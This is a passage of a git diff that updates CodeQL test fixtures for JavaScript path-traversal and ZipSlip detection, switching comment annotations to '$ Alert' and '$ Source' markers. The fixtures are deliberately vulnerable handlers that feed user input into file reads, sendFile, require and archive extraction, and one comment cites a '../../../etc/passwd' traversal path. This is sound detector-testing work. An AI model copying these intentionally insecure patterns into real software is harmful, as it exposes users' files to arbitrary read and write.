fs.readFileSync(path); // NOT OK - not normalized + fs.readFileSync(path); // $ Alert - not normalized }); app.get('/replace', (req, res) => { - let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); + let path = pathModule.normalize(req.query.path).replace(/%20/g, ' '); // $ Source if (!pathModule.isAbsolute(path)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert path = path.replace(/\.\./g, ''); - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/resolve-path', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); if (path.substring(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity if (path.slice(0, self.dir.length) === self.dir) - fs.readFileSync(path); // OK + fs.readFileSync(path); else - fs.readFileSync(path); // NOT OK - wrong polarity + fs.readFileSync(path); // $ Alert - wrong polarity }); app.get('/relative-startswith', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var self = something(); var relative = pathModule.relative(self.webroot, path); if(relative.startsWith(".." + pathModule.sep) || relative == "..") { - fs.readFileSync(path); // NOT OK! + fs.readFileSync(path); // $ Alert } else { - fs.readFileSync(path); // OK! + fs.readFileSync(path); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('..' + pathModule.sep) === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (relativePath.indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../') === 0) { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } else { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } let newpath = pathModule.normalize(path); var relativePath = pathModule.relative(pathModule.normalize(workspaceDir), newpath); if (pathModule.normalize(relativePath).indexOf('../')) { - fs.readFileSync(newpath); // OK! + fs.readFileSync(newpath); } else { - fs.readFileSync(newpath); // NOT OK! + fs.readFileSync(newpath); // $ Alert } }); var isPathInside = require("is-path-inside"), pathIsInside = require("path-is-inside"); app.get('/pseudo-normalizations', (req, res) => { - let path = req.query.path; - fs.readFileSync(path); // NOT OK + let path = req.query.path; // $ Source + fs.readFileSync(path); // $ Alert if (isPathInside(path, SAFE)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (pathIsInside(path, SAFE)) { - fs.readFileSync(path); // NOT OK - can be of the form 'safe/directory/../../../etc/passwd' + fs.readFileSync(path); // $ Alert - can be of the form 'safe/directory/../../../etc/passwd' return; } else { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } let normalizedPath = pathModule.join(SAFE, path); if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } if (pathIsInside(normalizedPath, SAFE)) { - fs.readFileSync(normalizedPath); // OK + fs.readFileSync(normalizedPath); return; } else { - fs.readFileSync(normalizedPath); // NOT OK + fs.readFileSync(normalizedPath); // $ Alert } }); app.get('/yet-another-prefix', (req, res) => { - let path = pathModule.resolve(req.query.path); + let path = pathModule.resolve(req.query.path); // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var abs = pathModule.resolve(path); if (abs.indexOf(root) !== 0) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert return; } - fs.readFileSync(path); // OK + fs.readFileSync(path); }); var rootPath = process.cwd(); app.get('/yet-another-prefix2', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var requestPath = pathModule.join(rootPath, path); var targetPath; if (!allowPath(requestPath, rootPath)) { targetPath = rootPath; - fs.readFileSync(requestPath); // NOT OK + fs.readFileSync(requestPath); // $ Alert } else { targetPath = requestPath; - fs.readFileSync(requestPath); // OK + fs.readFileSync(requestPath); } - fs.readFileSync(targetPath); // OK + fs.readFileSync(targetPath); function allowPath(requestPath, rootPath) { return requestPath.indexOf(rootPath) === 0; @@ -374,58 +374,58 @@ app.get('/yet-another-prefix2', (req, res) => { import slash from 'slash'; app.get('/slash-stuff', (req, res) => { - let path = req.query.path; + let path = req.query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert - fs.readFileSync(slash(path)); // NOT OK + fs.readFileSync(slash(path)); // $ Alert }); app.get('/dotdot-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.match(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.match(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.match(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); app.get('/join-spread', (req, res) => { - fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // NOT OK - fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // NOT OK + fs.readFileSync(pathModule.join('foo', ...req.query.x.split('/'))); // $ Alert + fs.readFileSync(pathModule.join(...req.query.x.split('/'))); // $ Alert }); app.get('/dotdot-matchAll-regexp', (req, res) => { - let path = pathModule.normalize(req.query.x); + let path = pathModule.normalize(req.query.x); // $ Source if (pathModule.isAbsolute(path)) return; - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert if (!path.matchAll(/\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\./)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\//)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } if (!path.matchAll(/\.\.\/foo/)) { - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert } if (!path.matchAll(/(\.\.\/|\.\.\\)/)) { - fs.readFileSync(path); // OK + fs.readFileSync(path); } }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js index 1dac13246c6f..3c137faa8c94 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/other-fs-libraries.js @@ -6,22 +6,22 @@ var http = require("http"), originalFs = require("original-fs"); var server = http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK - gracefulFs.readFileSync(path); // NOT OK - fsExtra.readFileSync(path); // NOT OK - originalFs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + gracefulFs.readFileSync(path); // $ Alert + fsExtra.readFileSync(path); // $ Alert + originalFs.readFileSync(path); // $ Alert - getFsModule(true).readFileSync(path); // NOT OK - getFsModule(false).readFileSync(path); // NOT OK + getFsModule(true).readFileSync(path); // $ Alert + getFsModule(false).readFileSync(path); // $ Alert - require("./my-fs-module").require(true).readFileSync(path); // NOT OK + require("./my-fs-module").require(true).readFileSync(path); // $ Alert let flexibleModuleName = require(process.versions["electron"] ? "original-fs" : "fs"); - flexibleModuleName.readFileSync(path); // NOT OK + flexibleModuleName.readFileSync(path); // $ Alert }); function getFsModule(special) { @@ -35,50 +35,50 @@ function getFsModule(special) { var util = require("util"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - util.promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisify(fs.readFileSync)(path); // NOT OK - require("bluebird").promisifyAll(fs).readFileSync(path); // NOT OK + util.promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisify(fs.readFileSync)(path); // $ Alert + require("bluebird").promisifyAll(fs).readFileSync(path); // $ Alert }); const asyncFS = require("./my-async-fs-module"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK - asyncFS.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert + asyncFS.readFileSync(path); // $ Alert - require("pify")(fs.readFileSync)(path); // NOT OK - require("pify")(fs).readFileSync(path); // NOT OK + require("pify")(fs.readFileSync)(path); // $ Alert + require("pify")(fs).readFileSync(path); // $ Alert - require('util.promisify')(fs.readFileSync)(path); // NOT OK + require('util.promisify')(fs.readFileSync)(path); // $ Alert - require("thenify")(fs.readFileSync)(path); // NOT OK + require("thenify")(fs.readFileSync)(path); // $ Alert const readPkg = require('read-pkg'); - var pkg = readPkg.readPackageSync({cwd: path}); // NOT OK - var pkgPromise = readPkg.readPackageAsync({cwd: path}); // NOT OK + var pkg = readPkg.readPackageSync({cwd: path}); // $ Alert + var pkgPromise = readPkg.readPackageAsync({cwd: path}); // $ Alert }); const mkdirp = require("mkdirp"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK - mkdirp(path); // NOT OK - mkdirp.sync(path); // NOT OK + fs.readFileSync(path); // $ Alert + mkdirp(path); // $ Alert + mkdirp.sync(path); // $ Alert func(path); }); function func(x) { - fs.readFileSync(x); // NOT OK + fs.readFileSync(x); // $ Alert } const fsp = require("fs/promises"); http.createServer(function(req, res) { - var path = url.parse(req.url, true).query.path; + var path = url.parse(req.url, true).query.path; // $ Source - fsp.readFile(path); // NOT OK + fsp.readFile(path); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js index 7546bb2c2938..c198082b9932 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/prettier.js @@ -3,12 +3,12 @@ const prettier = require("prettier"); const app = express(); app.get('/some/path', function (req, res) { - const { p } = req.params; - prettier.resolveConfig(p).then((options) => { // NOT OK + const { p } = req.params; // $ Source + prettier.resolveConfig(p).then((options) => { // $ Alert const formatted = prettier.format("foo", options); }); - prettier.resolveConfig("foo", {config: p}).then((options) => { // NOT OK + prettier.resolveConfig("foo", {config: p}).then((options) => { // $ Alert const formatted = prettier.format("bar", options); }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js index 363b2f014c7a..8b0a64f523c9 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/pupeteer.js @@ -2,15 +2,15 @@ const puppeteer = require('puppeteer'); const parseTorrent = require('parse-torrent'); (async () => { - let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; + let tainted = "dir/" + parseTorrent(torrent).name + ".torrent.data"; // $ Source const browser = await puppeteer.launch(); const page = await browser.newPage(); - await page.pdf({ path: tainted, format: 'a4' }); + await page.pdf({ path: tainted, format: 'a4' }); // $ Alert const pages = await browser.pages(); for (let i = 0; i < something(); i++) { - pages[i].screenshot({ path: tainted }); + pages[i].screenshot({ path: tainted }); // $ Alert } await browser.close(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js index eebc95348ba6..23c89ab5baec 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/sharedlib-repro.js @@ -10,7 +10,7 @@ function getTree(req, res, options) { var workspaceId = req.params.workspaceId; var realfileRootPath = workspaceId; // getfileRoot(workspaceId); var filePath = workspaceId; // path.join(options.workspaceDir,realfileRootPath, req.params["0"]); - withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); + withStatsAndETag(req.params.workspaceId, function (err, stats, etag) {}); // $ Source } function getfileRoot(workspaceId) { @@ -19,7 +19,7 @@ function getfileRoot(workspaceId) { } function withStatsAndETag(filepath, callback) { - fs.readFileSync(filepath); // NOT OK + fs.readFileSync(filepath); // $ Alert }; function decodeUserIdFromWorkspaceId(workspaceId) { diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js index 465b5b70b690..ab5d3f008507 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-access-paths.js @@ -3,32 +3,32 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - fs.readFileSync(path); // NOT OK + fs.readFileSync(path); // $ Alert var obj = bla ? something() : path; - fs.readFileSync(obj.sub); // NOT OK + fs.readFileSync(obj.sub); // $ Alert obj.sub = "safe"; - fs.readFileSync(obj.sub); // OK + fs.readFileSync(obj.sub); obj.sub2 = "safe"; if (random()) { - fs.readFileSync(obj.sub2); // OK + fs.readFileSync(obj.sub2); } if (random()) { obj.sub3 = "safe" } - fs.readFileSync(obj.sub3); // NOT OK + fs.readFileSync(obj.sub3); // $ Alert obj.sub4 = - fs.readFileSync(obj.sub4) ? // NOT OK - fs.readFileSync(obj.sub4) : // NOT OK - fs.readFileSync(obj.sub4); // NOT OK + fs.readFileSync(obj.sub4) ? // $ Alert + fs.readFileSync(obj.sub4) : // $ Alert + fs.readFileSync(obj.sub4); // $ Alert }); server.listen(); @@ -36,8 +36,8 @@ server.listen(); var nodefs = require('node:fs'); var server2 = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; - nodefs.readFileSync(path); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + nodefs.readFileSync(path); // $ Alert }); server2.listen(); @@ -45,6 +45,6 @@ server2.listen(); const chownr = require("chownr"); var server3 = http.createServer(function (req, res) { - let path = url.parse(req.url, true).query.path; - chownr(path, "someuid", "somegid", function (err) {}); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + chownr(path, "someuid", "somegid", function (err) {}); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js index 061dec18a908..b37ebc2926ad 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-array-steps.js @@ -7,11 +7,11 @@ var fs = require('fs'), var server = http.createServer(function(req, res) { let path = url.parse(req.url, true).query.path; - res.write(fs.readFileSync(['public', path].join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(['public', path].join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps let parts = ['public', path]; parts = parts.map(x => x.toLowerCase()); - res.write(fs.readFileSync(parts.join('/'))); // BAD - but not flagged because we have no array-steps [INCONSISTENCY] + res.write(fs.readFileSync(parts.join('/'))); // $ MISSING: Alert - not flagged because we have no array-steps }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js index 49c5fa78fe8d..a21ae5a6f915 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-promise-steps.js @@ -3,13 +3,13 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source doRead(Promise.resolve(path)); }); async function doRead(pathPromise) { - fs.readFileSync(await pathPromise); // NOT OK - pathPromise.then(path => fs.readFileSync(path)); // NO TOK + fs.readFileSync(await pathPromise); // $ Alert + pathPromise.then(path => fs.readFileSync(path)); // $ Alert } server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js index 23f89c55c39f..d9c07feb26b6 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-require.js @@ -3,15 +3,14 @@ var express = require('express'); var app = express(); app.get('/some/path', function(req, res) { - // BAD: loading a module based on un-sanitized query parameters - var m = require(req.param("module")); + var m = require(req.param("module")); // $ Alert - loading a module based on un-sanitized query parameters }); const resolve = require("resolve"); app.get('/some/path', function(req, res) { - var module = resolve.sync(req.param("module")); // NOT OK - resolving module based on query parameters + var module = resolve.sync(req.param("module")); // $ Alert - resolving module based on query parameters - resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // NOT OK - resolving module based on query parameters + resolve(req.param("module"), { basedir: __dirname }, function(err, res) { // $ Alert - resolving module based on query parameters var module = res; }); }); \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js index f4f289895a86..1c58a6943fa2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-sendFile.js @@ -4,39 +4,33 @@ let path = require('path'); var app = express(); app.get('/some/path/:x', function(req, res) { - // BAD: sending a file based on un-sanitized query parameters - res.sendFile(req.param("gimme")); - // BAD: same as above - res.sendfile(req.param("gimme")); + res.sendFile(req.param("gimme")); // $ Alert - sending a file based on un-sanitized query parameters + res.sendfile(req.param("gimme")); // $ Alert - same as above - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendFile(req.param("gimme"), { root: process.cwd() }); - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.sendfile(req.param("gimme"), { root: process.cwd() }); - // BAD: doesn't help if user controls root - res.sendFile(req.param("file"), { root: req.param("dir") }); + res.sendFile(req.param("file"), { root: req.param("dir") }); // $ Alert - doesn't help if user controls root let homeDir = path.resolve('.'); - res.sendFile(homeDir + '/data/' + req.params.x); // OK: sendFile disallows ../ - res.sendfile('data/' + req.params.x); // OK: sendfile disallows ../ + res.sendFile(homeDir + '/data/' + req.params.x); // OK - sendFile disallows ../ + res.sendfile('data/' + req.params.x); // OK - sendfile disallows ../ - res.sendFile(path.resolve('data', req.params.x)); // NOT OK - res.sendfile(path.join('data', req.params.x)); // NOT OK + res.sendFile(path.resolve('data', req.params.x)); // $ Alert + res.sendfile(path.join('data', req.params.x)); // $ Alert res.sendFile(homeDir + path.join('data', req.params.x)); // kinda OK - can only escape from 'data/' - // BAD: downloading a file based on un-sanitized query parameters - res.download(req.param("gimme")); + res.download(req.param("gimme")); // $ Alert - // BAD: download allows ../ - res.download(homeDir + '/data/' + req.params.x); + res.download(homeDir + '/data/' + req.params.x); // $ Alert - res.download(path.join('data', req.params.x)); // NOT OK + res.download(path.join('data', req.params.x)); // $ Alert - // BAD: doesn't help if user controls root - res.download(req.param("file"), { root: req.param("dir") }); + res.download(req.param("file"), { root: req.param("dir") }); // $ Alert - // GOOD: ensures files cannot be accessed outside of root folder + // OK - ensures files cannot be accessed outside of root folder res.download(req.param("gimme"), { root: process.cwd() }); }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js index 1b1e87b9a76a..6f281013a63c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/tainted-string-steps.js @@ -3,29 +3,29 @@ var fs = require('fs'), url = require('url'); var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; - fs.readFileSync(path.substring(i, j)); // OK - fs.readFileSync(path.substring(4)); // NOT OK - fs.readFileSync(path.substring(0, i)); // NOT OK - fs.readFileSync(path.substr(4)); // NOT OK - fs.readFileSync(path.slice(4)); // NOT OK + let path = url.parse(req.url, true).query.path; // $ Source + fs.readFileSync(path.substring(i, j)); + fs.readFileSync(path.substring(4)); // $ Alert + fs.readFileSync(path.substring(0, i)); // $ Alert + fs.readFileSync(path.substr(4)); // $ Alert + fs.readFileSync(path.slice(4)); // $ Alert - fs.readFileSync(path.concat(unknown)); // NOT OK - fs.readFileSync(unknown.concat(path)); // NOT OK - fs.readFileSync(unknown.concat(unknown, path)); // NOT OK + fs.readFileSync(path.concat(unknown)); // $ Alert + fs.readFileSync(unknown.concat(path)); // $ Alert + fs.readFileSync(unknown.concat(unknown, path)); // $ Alert - fs.readFileSync(path.trim()); // NOT OK - fs.readFileSync(path.toLowerCase()); // NOT OK + fs.readFileSync(path.trim()); // $ Alert + fs.readFileSync(path.toLowerCase()); // $ Alert - fs.readFileSync(path.split('/')); // OK (readFile throws an exception when the filename is an array) - fs.readFileSync(path.split('/')[0]); // OK -- for now - fs.readFileSync(path.split('/')[i]); // NOT OK - fs.readFileSync(path.split(/\//)[i]); // NOT OK - fs.readFileSync(path.split("?")[0]); // NOT OK - fs.readFileSync(path.split(unknown)[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown).whatever); // OK -- but still flagged [INCONSISTENCY] - fs.readFileSync(path.split(unknown)); // NOT OK - fs.readFileSync(path.split("?")[i]); // NOT OK -- but not yet flagged [INCONSISTENCY] + fs.readFileSync(path.split('/')); // OK - readFile throws an exception when the filename is an array + fs.readFileSync(path.split('/')[0]); // OK - for now + fs.readFileSync(path.split('/')[i]); // $ Alert + fs.readFileSync(path.split(/\//)[i]); // $ Alert + fs.readFileSync(path.split("?")[0]); // $ Alert + fs.readFileSync(path.split(unknown)[i]); // $ MISSING: Alert + fs.readFileSync(path.split(unknown).whatever); // $ SPURIOUS: Alert + fs.readFileSync(path.split(unknown)); // $ Alert + fs.readFileSync(path.split("?")[i]); // $ MISSING: Alert }); server.listen(); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js index 1e95cf84ec76..d3c74ed8493d 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/torrents.js @@ -2,7 +2,7 @@ const parseTorrent = require('parse-torrent'), fs = require('fs'); function getTorrentData(dir, torrent){ - let name = parseTorrent(torrent).name, + let name = parseTorrent(torrent).name, // $ Source loc = dir + "/" + name + ".torrent.data"; - return fs.readFileSync(loc); // NOT OK + return fs.readFileSync(loc); // $ Alert } diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts index f5fd62b2ee00..a0d2a78b5d7b 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/typescript.ts @@ -6,29 +6,28 @@ var fs = require('fs'), ; var server = http.createServer(function(req, res) { - let path = url.parse(req.url, true).query.path; + let path = url.parse(req.url, true).query.path; // $ Source - // BAD: This could read any file on the file system - res.write(fs.readFileSync(path)); + res.write(fs.readFileSync(path)); // $ Alert - This could read any file on the file system if (path === 'foo.txt') - res.write(fs.readFileSync(path)); // GOOD: Path is compared to white-list + res.write(fs.readFileSync(path)); // OK - Path is compared to white-list let path2 = path; - path2 ||= res.write(fs.readFileSync(path2)); // GOOD: path is falsy + path2 ||= res.write(fs.readFileSync(path2)); // OK - path is falsy let path3 = path; - path3 &&= res.write(fs.readFileSync(path3)); // BAD: path is truthy + path3 &&= res.write(fs.readFileSync(path3)); // $ Alert - path is truthy let path4 = path; - path4 ??= res.write(fs.readFileSync(path4)); // GOOD - path is null or undefined - but we don't capture that. [INCONSISTENCY] + path4 ??= res.write(fs.readFileSync(path4)); // $ SPURIOUS: Alert - path is null or undefined - but we don't capture that. let path5 = path; path5 &&= "clean"; - res.write(fs.readFileSync(path5)); // GOOD: path is either falsy or "clean"; + res.write(fs.readFileSync(path5)); // OK - path is either falsy or "clean"; let path6 = path; path6 ||= "clean"; - res.write(fs.readFileSync(path6)); // BAD: path can still be tainted + res.write(fs.readFileSync(path6)); // $ Alert - path can still be tainted }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js index 37ba5b7ab0e3..111ecd10c5a2 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/views.js @@ -1 +1 @@ -module.exports = (req, res) => res.render(req.params[0]); +module.exports = (req, res) => res.render(req.params[0]); // $ Alert diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js index 1de89842eb0d..8f587f6e143c 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/AdmZipBad.js @@ -3,5 +3,5 @@ var AdmZip = require('adm-zip'); var zip = new AdmZip("archive.zip"); var zipEntries = zip.getEntries(); zipEntries.forEach(function(zipEntry) { - fs.createWriteStream(zipEntry.entryName); + fs.createWriteStream(zipEntry.entryName); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js index 5398586e1251..543d43ffa310 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/TarSlipBad.js @@ -3,10 +3,10 @@ const tar = require('tar-stream'); const extract = tar.extract(); extract.on('entry', (header, stream, next) => { - const out = fs.createWriteStream(header.name); + const out = fs.createWriteStream(header.name); // $ Alert if (header.linkname) { - fs.linkSync(header.linkname, "foo"); + fs.linkSync(header.linkname, "foo"); // $ Alert } stream.pipe(out); diff --git a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected index 67e38f937ba0..f8916181de12 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/ZipSlip/ZipSlip.expected @@ -1,3 +1,28 @@ +#select +| AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | Unsanitized archive entry, which may contain '..', is used in a $@. | AdmZipBad.js:6:24:6:41 | zipEntry.entryName | file system operation | +| TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | TarSlipBad.js:6:36:6:46 | header.name | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:6:36:6:46 | header.name | file system operation | +| TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | TarSlipBad.js:9:17:9:31 | header.linkname | Unsanitized archive entry, which may contain '..', is used in a $@. | TarSlipBad.js:9:17:9:31 | header.linkname | file system operation | +| ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:5:37:5:46 | entry.path | ZipSlipBad2.js:6:22:6:29 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad2.js:6:22:6:29 | fileName | file system operation | +| ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:7:22:7:31 | entry.path | ZipSlipBad.js:8:37:8:44 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:8:37:8:44 | fileName | file system operation | +| ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:15:22:15:31 | entry.path | ZipSlipBad.js:16:30:16:37 | fileName | Unsanitized archive entry, which may contain '..', is used in a $@. | ZipSlipBad.js:16:30:16:37 | fileName | file system 